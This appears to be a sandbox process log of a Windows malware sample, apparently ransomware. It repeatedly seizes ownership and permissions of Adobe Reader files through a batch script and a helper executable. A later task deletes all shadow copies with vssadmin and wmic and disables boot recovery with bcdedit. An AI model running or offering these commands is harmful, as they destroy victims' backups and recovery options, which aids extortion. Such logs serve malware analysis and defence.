  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:1580
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:1972
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:736
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:512
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C
    3⤵
    PID:788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"
    3⤵
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "rss.gif" -nobanner
    3⤵
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "rss.gif" -nobanner
      4⤵
      PID:1520
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""
  2⤵
  PID:1380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
    3⤵
    PID:208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:1508
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "trash.gif" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    PID:684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:1544
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:596
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui""
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui"
    3⤵
    PID:236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:1140
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    PID:916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:872
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:512
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""
  2⤵
  PID:748

C:\Windows\system32\taskeng.exe
taskeng.exe {53026F55-A150-4EC1-B711-C191D5053C26} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]
1⤵
PID:2000
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\LmTU0w0y.bat"
  2⤵
  PID:1332
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1596
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1544
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1384
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1108